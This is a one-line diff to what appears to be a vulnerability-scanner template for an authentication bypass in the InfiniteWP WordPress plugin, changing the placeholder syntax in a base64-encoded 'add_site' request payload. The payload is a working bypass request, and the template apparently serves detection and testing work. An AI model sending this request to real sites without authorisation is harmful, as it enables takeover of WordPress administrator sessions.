--- a/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml
+++ b/vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml
@@ -29,7 +29,7 @@ requests:
         Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
         Content-Type: application/x-www-form-urlencoded
 
-        _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}}
+        _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"{{username}}\"}}")}}
 
     redirects: true
     extractors:
